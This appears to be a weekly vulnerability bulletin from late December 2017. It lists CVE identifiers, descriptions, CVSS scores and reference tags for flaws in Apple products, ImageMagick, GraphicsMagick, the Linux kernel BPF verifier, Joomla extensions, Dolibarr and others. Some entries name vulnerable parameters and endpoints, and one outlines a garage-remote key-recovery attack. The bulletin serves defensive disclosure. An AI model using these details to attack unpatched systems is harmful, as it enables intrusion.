Description | Published | CVSS Score | Source & Patch Info
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app that triggers type confusion.
Published: 2017-12-25 | CVSS Score: 4.3 | CVE-2017-13855
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
Published: 2017-12-25 | CVSS Score: 6.8 | CVE-2017-13856
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.
Published: 2017-12-25 | CVSS Score: 4.3 | CVE-2017-13865
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
Published: 2017-12-25 | CVSS Score: 6.8 | CVE-2017-13866
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.
Published: 2017-12-25 | CVSS Score: 4.3 | CVE-2017-13868
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. watchOS before 4.2 is affected. The issue involves the "Kernel" component. It allows attackers to bypass intended memory-read restrictions via a crafted app.
Published: 2017-12-25 | CVSS Score: 4.3 | CVE-2017-13869
BID
SECTRACK
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
EXPLOIT-DB
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
Published: 2017-12-25 | CVSS Score: 6.8 | CVE-2017-13870
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2.1 is affected. tvOS before 11.2.1 is affected. The issue involves the "HomeKit" component. It allows remote attackers to modify the application state by leveraging incorrect message handling, as demonstrated by use of an Apple Watch to obtain an encryption key and unlock a door.
Published: 2017-12-25 | CVSS Score: 5.0 | CVE-2017-13903
BID
SECTRACK
CONFIRM
CONFIRM
MISC
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. tvOS before 11.2 is affected. The issue involves the "Kernel" component. It allows local users to bypass intended memory-read restrictions or cause a denial of service (system crash).
Published: 2017-12-27 | CVSS Score: 5.6 | CVE-2017-7154
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
Published: 2017-12-27 | CVSS Score: 6.8 | CVE-2017-7156
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
Published: 2017-12-27 | CVSS Score: 6.8 | CVE-2017-7157
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- apple_tv
An issue was discovered in certain Apple products. iOS before 11.2 is affected. Safari before 11.0.2 is affected. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. tvOS before 11.2 is affected. The issue involves the "WebKit" component. It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.
Published: 2017-12-27 | CVSS Score: 6.8 | CVE-2017-7160
CONFIRM
CONFIRM
CONFIRM
CONFIRM
CONFIRM
apple -- icloud
An issue was discovered in certain Apple products. iCloud before 7.2 on Windows is affected. iTunes before 12.7.2 on Windows is affected. The issue involves the "APNs Server" component. It allows man-in-the-middle attackers to track users by leveraging mishandling of client certificates.
Published: 2017-12-25 | CVSS Score: 4.3 | CVE-2017-13864
BID
SECTRACK
CONFIRM
CONFIRM
apple -- iphone_os
An issue was discovered in certain Apple products. iOS before 11.2 is affected. macOS before 10.13.2 is affected. The issue involves the "Mail Drafts" component. It allows man-in-the-middle attackers to read e-mail content by leveraging mishandling of S/MIME credential encryption.
Published: 2017-12-25 | CVSS Score: 4.3 | CVE-2017-13860
BID
SECTRACK
SECTRACK
CONFIRM
CONFIRM
apple -- iphone_os
An issue was discovered in certain Apple products. iOS before 11.2 is affected. The issue involves the "Mail" component. It might allow remote attackers to bypass an intended encryption protection mechanism by leveraging incorrect S/MIME certificate selection.
Published: 2017-12-25 | CVSS Score: 5.0 | CVE-2017-13874
BID
SECTRACK
CONFIRM
apple -- iphone_os
An issue was discovered in certain Apple products. iOS before 11.2 is affected. The issue involves the "Mail Message Framework" component. It allows remote attackers to spoof the address bar via a crafted web site.
Published: 2017-12-27 | CVSS Score: 4.3 | CVE-2017-7152
CONFIRM
apple -- mac_os_x
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Mail" component. It allows remote attackers to read cleartext e-mail content (for which S/MIME encryption was intended) by leveraging the lack of installation of an S/MIME certificate by the recipient.
Published: 2017-12-25 | CVSS Score: 5.0 | CVE-2017-13871
BID
SECTRACK
CONFIRM
apple -- mac_os_x
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Intel Graphics Driver" component. It allows local users to bypass intended memory-read restrictions or cause a denial of service (out-of-bounds read and system crash).
Published: 2017-12-25 | CVSS Score: 5.6 | CVE-2017-13878
BID
SECTRACK
CONFIRM
apple -- mac_os_x
An issue was discovered in certain Apple products. macOS before 10.13.2 is affected. The issue involves the "Screen Sharing Server" component. It allows attackers to obtain root privileges for reading files by leveraging screen-sharing access.
Published: 2017-12-27 | CVSS Score: 6.8 | CVE-2017-7158
CONFIRM
graphicsmagick -- graphicsmagick
In GraphicsMagick 1.4 snapshot-20171217 Q8, there is a heap-based buffer over-read in ReadNewsProfile in coders/tiff.c, in which LocaleNCompare reads heap data beyond the allocated region.
Published: 2017-12-27 | CVSS Score: 6.8 | CVE-2017-17912
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick
In GraphicsMagick 1.4 snapshot-20171217 Q8, there is a stack-based buffer over-read in WriteWEBPImage in coders/webp.c, related to an incompatibility with libwebp versions 0.5.0 and later, which use a different structure type.
Published: 2017-12-27 | CVSS Score: 6.8 | CVE-2017-17913
CONFIRM
CONFIRM
graphicsmagick -- graphicsmagick
In GraphicsMagick 1.4 snapshot-20171217 Q8, there is a heap-based buffer over-read in ReadMNGImage in coders/png.c, related to accessing one byte before testing whether a limit has been reached.
Published: 2017-12-27 | CVSS Score: 6.8 | CVE-2017-17915
CONFIRM
CONFIRM
imagemagick -- imagemagick
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-21, there is a heap-based buffer over-read in ReadOneMNGImage in coders/png.c, related to length calculation and caused by an off-by-one error.
Published: 2017-12-27 | CVSS Score: 6.8 | CVE-2017-17879
BID
CONFIRM
DEBIAN
imagemagick -- imagemagick
In ImageMagick 7.0.7-16 Q16 x86_64 2017-12-21, there is a stack-based buffer over-read in WriteWEBPImage in coders/webp.c, related to a WEBP_DECODER_ABI_VERSION check.
Published: 2017-12-27 | CVSS Score: 6.8 | CVE-2017-17880
CONFIRM
imagemagick -- imagemagick
In ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadMATImage in coders/mat.c, which allows attackers to cause a denial of service via a crafted MAT image file.
Published: 2017-12-27 | CVSS Score: 4.3 | CVE-2017-17881
CONFIRM
imagemagick -- imagemagick
In ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadXPMImage in coders/xpm.c, which allows attackers to cause a denial of service via a crafted XPM image file.
Published: 2017-12-27 | CVSS Score: 4.3 | CVE-2017-17882
CONFIRM
imagemagick -- imagemagick
In ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadPGXImage in coders/pgx.c, which allows attackers to cause a denial of service via a crafted PGX image file.
Published: 2017-12-27 | CVSS Score: 4.3 | CVE-2017-17883
CONFIRM
imagemagick -- imagemagick
In ImageMagick 7.0.7-16 Q16, a memory leak vulnerability was found in the function WriteOnePNGImage in coders/png.c, which allows attackers to cause a denial of service via a crafted PNG image file.
Published: 2017-12-27 | CVSS Score: 4.3 | CVE-2017-17884
CONFIRM
imagemagick -- imagemagick
In ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadPICTImage in coders/pict.c, which allows attackers to cause a denial of service via a crafted PICT image file.
Published: 2017-12-27 | CVSS Score: 4.3 | CVE-2017-17885
CONFIRM
imagemagick -- imagemagick
In ImageMagick 7.0.7-12 Q16, a memory leak vulnerability was found in the function ReadPSDChannelZip in coders/psd.c, which allows attackers to cause a denial of service via a crafted psd image file.
Published: 2017-12-27 | CVSS Score: 4.3 | CVE-2017-17886
CONFIRM
imagemagick -- imagemagick
In ImageMagick 7.0.7-16 Q16, a memory leak vulnerability was found in the function GetImagePixelCache in magick/cache.c, which allows attackers to cause a denial of service via a crafted MNG image file that is processed by ReadOneMNGImage.
Published: 2017-12-27 | CVSS Score: 4.3 | CVE-2017-17887
CONFIRM
imagemagick -- imagemagick
ImageMagick 7.0.7-17 Q16 x86_64 has memory leaks in coders/msl.c, related to MSLPopImage and ProcessMSLScript, and associated with mishandling of MSLPushImage calls.
Published: 2017-12-27 | CVSS Score: 5.0 | CVE-2017-17934
CONFIRM

 

Low Vulnerabilities

Primary
Vendor -- Product
Description | Published | CVSS Score | Source & Patch Info
There were no low vulnerabilities recorded this week.

 

Severity Not Yet Assigned

Primary
Vendor -- Product
Description | Published | CVSS Score | Source & Patch Info
2daybiz.com -- readymade_job_site_script
 
Readymade Job Site Script has SQL Injection via the location_name array parameter to the /job URI.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17895
MISC
2daybiz.com -- readymade_job_site_script
 
Readymade Job Site Script has CSRF via the /job URI.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17894
MISC
2daybiz.com -- readymade_job_site_script
 
Readymade Job Site Script has XSS via the keyword parameter to the /job URI.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17896
MISC
airlive -- multiple_products
 
cgi-bin/mft/wireless_mft.cgi in AirLive BU-2015 with firmware 1.03.18 16.06.2014, AirLive BU-3026 with firmware 1.43 21.08.2014, AirLive MD-3025 with firmware 1.81 21.08.2014, AirLive WL-2000CAM with firmware LM.1.6.18 14.10.2011, and AirLive POE-200CAM v2 with firmware LM.1.6.17.01 uses hard-coded credentials in the embedded Boa web server, which allows remote attackers to obtain user credentials via crafted HTTP requests.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2014-8389
MISC
FULLDISC
BUGTRAQ
BID
MISC
allmediaserver -- allplayer
 
A buffer overflow vulnerability exists in MediaServer.exe in ALLPlayer ALLMediaServer 0.95 and earlier that could allow remote attackers to execute arbitrary code and/or cause denial of service on the victim machine/computer via a long string to TCP port 888.
Published: 2017-12-28 | CVSS Score: not yet calculated | CVE-2017-17932
EXPLOIT-DB
anti-web -- anti-web
 
cgi-bin/write.cgi in Anti-Web through 3.8.7, as used on NetBiter / HMS, Ouman EH-net, Alliance System WS100 --> AWU 500, Sauter ERW100F001, Carlo Gavazzi SIU-DLG, AEDILIS SMART-1, SYXTHSENSE WebBiter, ABB SREA, and ASCON DY WebServer devices, allows remote authenticated users to execute arbitrary OS commands via crafted multipart/form-data content, a different vulnerability than CVE-2017-9097.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17888
MISC
MISC
MISC
apache -- flexblaze_ds
 
Previous versions of Apache Flex BlazeDS (4.7.2 and earlier) did not restrict which types were allowed for AMF(X) object deserialization by default. During the deserialization process code is executed that for several known types has undesired side-effects. Other, unknown types may also exhibit such behaviors. One vector in the Java standard library exists that allows an attacker to trigger possibly further exploitable Java deserialization of untrusted data. Other known vectors in third party libraries can be used to trigger remote code execution.
Published: 2017-12-28 | CVSS Score: not yet calculated | CVE-2017-5641
MLIST
BID
SECTRACK
CONFIRM
CERT-VN
archon -- archon
 
packages/core/contact.php in Archon 3.21 rev-1 has XSS in the referer parameter in an index.php?p=core/contact request, aka Open Bug Bounty ID OBB-278503.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17911
MISC
artifex -- mupdf
 
pdf/pdf-write.c in Artifex MuPDF before 1.12.0 mishandles certain length changes when a repair operation occurs during a clean operation, which allows remote attackers to cause a denial of service (buffer overflow and application crash) or possibly have unspecified other impact via a crafted PDF document.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17866
CONFIRM
CONFIRM
asterisk -- asterisk
 
An issue was discovered in Asterisk 13.18.4 and older, 14.7.4 and older, 15.1.4 and older, and 13.18-cert1 and older. A select set of SIP messages create a dialog in Asterisk. Those SIP messages must contain a contact header. For those messages, if the header was not present and the PJSIP channel driver was used, Asterisk would crash. The severity of this vulnerability is somewhat mitigated if authentication is enabled. If authentication is enabled, a user would have to first be authorized before reaching the crash point.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17850
CONFIRM
SECTRACK
CONFIRM
auth0/passport-wsfed-saml2_library -- auth0/passport-wsfed-saml2_library
 
A vulnerability has been discovered in the Auth0 passport-wsfed-saml2 library affecting versions < 3.0.5. This vulnerability allows an attacker to impersonate another user and potentially elevate their privileges if the SAML identity provider does not sign the full SAML response (e.g., only signs the assertion within the response).
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-16897
CONFIRM
ba_systems -- bas_web
 
BA SYSTEMS BAS Web on BAS920 devices (with Firmware 01.01.00*, HTTPserv 00002, and Script 02.*) and ISC2000 devices allows remote attackers to obtain sensitive information via a request for isc/get_sid_js.aspx or isc/get_sid.aspx, as demonstrated by obtaining administrative access by subsequently using the credential information for the Supervisor/Administrator account.
Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2017-17974
MISC
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 
Biometric Shift Employee Management System has XSS via the Last_Name parameter in an index.php?user=ajax request.
Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2017-17995
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 
Biometric Shift Employee Management System has XSS via the amount parameter in an index.php?user=addition_deduction request.
Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2017-17993
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 
Biometric Shift Employee Management System has CSRF via index.php in an edit_holiday action.
Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2017-17990
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 
Biometric Shift Employee Management System has XSS via the expense_name parameter in an index.php?user=expenses request.
Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2017-17991
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 
Biometric Shift Employee Management System has XSS via the index.php holiday_name parameter in an edit_holiday action.
Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2017-17989
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 
Biometric Shift Employee Management System allows Arbitrary File Download via directory traversal sequences in the index.php form_file_name parameter in a download_form action.
Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2017-17992
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 
Biometric Shift Employee Management System has XSS via the criteria parameter in an index.php?user=competency_criteria request.
Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2017-17994
MISC
biometric_shift_employee_management_system -- biometric_shift_employee_management_system 
 
Biometric Shift Employee Management System 3.0 allows remote attackers to bypass intended file-read restrictions via a user=download request with a pathname in the path parameter.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17876
EXPLOIT-DB
cells -- cells_blog
 
Cells Blog 3.5 has SQL Injection via the pub_readpost.php ptid parameter.
Published: 2017-12-28 | CVSS Score: not yet calculated | CVE-2017-17950
MISC
cells -- cells_blog
 
Cells Blog 3.5 has XSS via the pub_readpost.php fmid parameter.
Published: 2017-12-28 | CVSS Score: not yet calculated | CVE-2017-17949
MISC
cells -- cells_blog
 
Cells Blog 3.5 has XSS via the jfdname parameter in an act=showpic request.
Published: 2017-12-28 | CVSS Score: not yet calculated | CVE-2017-17948
MISC
dolibarr -- erp/crm
 
SQL injection vulnerability in fourn/index.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the socid parameter.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17900
CONFIRM
dolibarr -- erp/crm
 
Dolibarr ERP/CRM version 6.0.4 does not block direct requests to *.tpl.php files, which allows remote attackers to obtain sensitive information.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17898
CONFIRM
CONFIRM
dolibarr -- erp/crm
 
SQL injection vulnerability in adherents/subscription/info.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the rowid parameter.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17899
CONFIRM
dolibarr -- erp/crm
 
SQL injection vulnerability in comm/multiprix.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the id parameter.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17897
CONFIRM
dolibarr -- erp/crm
 
The test_sql_and_script_inject function in htdocs/main.inc.php in Dolibarr ERP/CRM 6.0.4 blocks some event attributes but neither onclick nor onscroll, which allows XSS.
Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2017-17971
MISC
dozer -- dozer
 
Dozer improperly uses a reflection-based approach to type conversion, which might allow remote attackers to execute arbitrary code via a crafted serialized object.
Published: 2017-12-29 | CVSS Score: not yet calculated | CVE-2014-9515
CONFIRM
MISC
MISC
enigmail -- enigmail 
 
An issue was discovered in Enigmail before 1.9.9. Improper Random Secret Generation occurs because Math.Random() is used by pretty Easy privacy (pEp), aka TBE-01-001.
Published: 2017-12-27 | CVSS Score: not yet calculated | CVE-2017-17845
MISC
MISC
DEBIAN
MISC
enigmail -- enigmail 
 
An issue was discovered in Enigmail before 1.9.9 that allows remote attackers to trigger use of an intended public key for encryption, because incorrect regular expressions are used for extraction of an e-mail address from a comma-separated list, as demonstrated by a modified Full Name field and a homograph attack, aka TBE-01-002.2017-12-27not yet calculatedCVE-2017-17843
MISC
MISC
DEBIAN
MISC
enigmail -- enigmail 
 
An issue was discovered in Enigmail before 1.9.9. Signature spoofing is possible because the UI does not properly distinguish between an attachment signature, and a signature that applies to the entire containing message, aka TBE-01-021. This is demonstrated by an e-mail message with an attachment that is a signed e-mail message in message/rfc822 format.2017-12-27not yet calculatedCVE-2017-17847
MISC
MISC
MISC
DEBIAN
MISC
enigmail -- enigmail 
 
An issue was discovered in Enigmail before 1.9.9. In a variant of CVE-2017-17847, signature spoofing is possible for multipart/related messages because a signed message part can be referenced with a cid: URI but not actually displayed. In other words, the entire containing message appears to be signed, but the recipient does not see any of the signed text.2017-12-27not yet calculatedCVE-2017-17848
MISC
MISC
DEBIAN
enigmail -- enigmail 
 
An issue was discovered in Enigmail before 1.9.9. Regular expressions are exploitable for Denial of Service, because of attempts to match arbitrarily long strings, aka TBE-01-003.2017-12-27not yet calculatedCVE-2017-17846
MISC
MISC
DEBIAN
MISC
enigmail -- enigmail 
 
An issue was discovered in Enigmail before 1.9.9. A remote attacker can obtain cleartext content by sending an encrypted data block (that the attacker cannot directly decrypt) to a victim, and relying on the victim to automatically decrypt that block and then send it back to the attacker as quoted text, aka the TBE-01-005 "replay" issue.2017-12-27not yet calculatedCVE-2017-17844
MISC
MISC
DEBIAN
MISC
ffmpeg -- ffmpeg
 
The dnxhd decoder in FFmpeg before 3.2.6, and 3.3.x before 3.3.3 allows remote attackers to cause a denial of service (NULL pointer dereference) via a crafted mov file.2017-12-27not yet calculatedCVE-2017-9608
MLIST
MLIST
BID
CONFIRM
CONFIRM
CONFIRM
DEBIAN
flexsense -- sysguage_server
 
In Flexense SysGauge Server 3.6.18, the Control Protocol suffers from a denial of service. The attack vector is a crafted SERVER_GET_INFO packet sent to control port 9221.2017-12-28not yet calculatedCVE-2017-15667
EXPLOIT-DB
fortunescripts.com -- fs_lynda_clone
 
FS Lynda Clone has CSRF via user/edit_profile, as demonstrated by adding content to the user panel.2017-12-27not yet calculatedCVE-2017-17903
MISC
fortunescripts.com -- fs_lynda_clone
 
FS Lynda Clone has XSS via the keywords parameter to tutorial/ or the edit_profile_first_name parameter to user/edit_profile.2017-12-27not yet calculatedCVE-2017-17904
MISC
getgo_software -- getgo_download_manager
 
A buffer overflow vulnerability in GetGo Download Manager 5.3.0.2712 and earlier could allow remote HTTP servers to execute arbitrary code on NAS devices via a long response.2017-12-27not yet calculatedCVE-2017-17849
MISC
EXPLOIT-DB
google -- play
 
XML external entity (XXE) vulnerability in the Java XML processing functionality in Play before 2.2.6 and 2.3.x before 2.3.5 might allow remote attackers to read arbitrary files, cause a denial of service, or have unspecified other impact via crafted XML data.2017-12-29not yet calculatedCVE-2014-3630
CONFIRM
CONFIRM
MISC
CONFIRM
hoermann -- bisecur_devices
 
On Hoermann BiSecur devices before 2018, a vulnerability can be exploited by recording a single radio transmission. An attacker can intercept an arbitrary radio frame exchanged between a BiSecur transmitter and a receiver to obtain the encrypted packet and the 32-bit serial number. The interception of the one-time pairing process is specifically not required. Due to use of AES-128 with an initial static random value and static data vector (all of this static information is the same across different customers' installations), the attacker can easily derive the utilized encryption key and decrypt the intercepted packet. The key can be verified by decrypting the intercepted packet and checking for known plaintext. Subsequently, an attacker can create arbitrary radio frames with the correct encryption key to control BiSecur garage and entrance gate operators and possibly other BiSecur systems as well ("wireless cloning"). To conduct the attack, a low cost Software Defined Radio (SDR) is sufficient. This affects Hoermann Hand Transmitter HS5-868-BS, HSE1-868-BS, and HSE2-868-BS devices.2017-12-29not yet calculatedCVE-2017-17910
MISC
MISC
ibm -- rational_collaborative_lifecycle_managment
 
An undisclosed vulnerability in CLM applications (including IBM Rational Collaborative Lifecycle Management 4.0, 5.0, and 6.0) with potential for failure to restrict URL Access. IBM X-Force ID: 123661.2017-12-27not yet calculatedCVE-2017-1191
CONFIRM
MISC
ibm -- team_concert
 
IBM Team Concert (RTC including IBM Rational Collaborative Lifecycle Management 4.0, 5.0., and 6.0) is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-force ID: 126858.2017-12-27not yet calculatedCVE-2017-1365
CONFIRM
MISC
ibm -- websphere_portal
 
IBM WebSphere Portal 7.0, 8.0, 8.5, and 9.0 could reveal sensitive information from an error message that could lead to further attacks against the system. IBM X-Force ID: 124390.2017-12-27not yet calculatedCVE-2017-1698
CONFIRM
BID
SECTRACK
MISC
jboss -- keycloak
 
JBoss KeyCloak before 1.0.3.Final allows remote attackers to cause a denial of service (resource consumption) via a large value in the size parameter to auth/qrcode, related to QR code generation.2017-12-29not yet calculatedCVE-2014-3651
CONFIRM
CONFIRM
joomla! -- joomla!
 
The JEXTN FAQ Pro extension 4.0.0 for Joomla! has SQL Injection via the id parameter in a view=category action.2017-12-27not yet calculatedCVE-2017-17875
EXPLOIT-DB
joomla! -- joomla!
 
The "JEXTN Question And Answer" extension 3.1.0 for Joomla! has SQL Injection via the an parameter in a view=tags action, or the ques-srch parameter.2017-12-27not yet calculatedCVE-2017-17871
EXPLOIT-DB
joomla! -- joomla!
 
The JBuildozer extension 1.4.1 for Joomla! has SQL Injection via the appid parameter in an entriessearch action.2017-12-27not yet calculatedCVE-2017-17870
MISC
EXPLOIT-DB
joomla! -- joomla!
 
Multiple cross-site scripting (XSS) vulnerabilities in helpers/comment.php in the StackIdeas Komento (com_komento) component before 2.0.5 for Joomla! allow remote attackers to inject arbitrary web script or HTML via the (1) img or (2) url tag of a new comment.2017-12-27not yet calculatedCVE-2015-7324
FULLDISC
CONFIRM
MISC
joomla! -- joomla!
 
The JEXTN Video Gallery extension 3.0.5 for Joomla! has SQL Injection via the id parameter in a view=category action.2017-12-27not yet calculatedCVE-2017-17872
EXPLOIT-DB
kingsoft -- wps_office
 
pptreader.dll in Kingsoft WPS Office 10.1.0.6930 allows remote attackers to cause a denial of service via a crafted PPT file, aka CNVD-2017-35482.2017-12-28not yet calculatedCVE-2017-17967
MISC
libtiff -- libtiff
 
In LibTIFF 4.0.9, there is a heap-based buffer over-read in the function PackBitsEncode in tif_packbits.c.2017-12-28not yet calculatedCVE-2017-17942
MISC
BID
libtiff -- libtiff
 
In LibTIFF 4.0.8, there is a heap-based use-after-free in the t2p_writeproc function in tiff2pdf.c.2017-12-29not yet calculatedCVE-2017-17973
MISC
liferay -- liferay_portal
 
In Liferay Portal 6.1.0, the tags section has XSS via a Public Render Parameter (p_r_p) value, as demonstrated by p_r_p_564233524_tag.2017-12-27not yet calculatedCVE-2017-17868
MISC
linux -- linux_kernelkernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect BPF_RSH signed bounds calculations.2017-12-27not yet calculatedCVE-2017-17853
MISC
MISC
MISC
linux -- linux_kernel
 
kernel/bpf/verifier.c in the Linux kernel through 4.14.8 ignores unreachable code, even though it would still be processed by JIT compilers. This behavior, also considered an improper branch-pruning logic issue, could possibly be used by local users for denial of service.2017-12-27not yet calculatedCVE-2017-17862
MISC
SECTRACK
MISC
MISC
DEBIAN
MISC
linux -- linux_kernel
 
kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (integer overflow and memory corruption) or possibly have unspecified other impact by leveraging unrestricted integer values for pointer arithmetic.2017-12-27not yet calculatedCVE-2017-17854
MISC
MISC
MISC
linux -- linux_kernel
 
kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging the lack of stack-pointer alignment enforcement.2017-12-27not yet calculatedCVE-2017-17856
MISC
MISC
MISC
linux -- linux_kernel
 
The check_stack_boundary function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of invalid variable stack read operations.2017-12-27not yet calculatedCVE-2017-17857
MISC
MISC
MISC
linux -- linux_kernel
 
kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging improper use of pointers in place of scalars.2017-12-27not yet calculatedCVE-2017-17855
MISC
MISC
MISC
linux -- linux_kernel
 
kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging mishandling of 32-bit ALU ops.2017-12-27not yet calculatedCVE-2017-17852
MISC
MISC
MISC
linux -- linux_kernel
 
kernel/bpf/verifier.c in the Linux kernel 4.9.x through 4.9.71 does not check the relationship between pointer values and the BPF stack, which allows local users to cause a denial of service (integer overflow or invalid memory access) or possibly have unspecified other impact.2017-12-27not yet calculatedCVE-2017-17863
SECTRACK
MISC
DEBIAN
MISC
linux -- linux_kernel
 
Use-after-free in the usbtv_probe function in drivers/media/usb/usbtv/usbtv-core.c in the Linux kernel through 4.14.10 allows attackers to cause a denial of service (system crash) or possibly have unspecified other impact by triggering failure of audio registration, because a kfree of the usbtv data structure occurs during a usbtv_video_free call, but the usbtv_video_fail label's code attempts to both access and free this data structure.2017-12-29not yet calculatedCVE-2017-17975
MISC
linux -- linux_kernel
 
The check_alu_op function in kernel/bpf/verifier.c in the Linux kernel through 4.14.8 allows local users to cause a denial of service (memory corruption) or possibly have unspecified other impact by leveraging incorrect sign extension.2017-12-27not yet calculatedCVE-2017-16995
MISC
MISC
BID
MISC
MISC
DEBIAN
linux -- linux_kernel
 
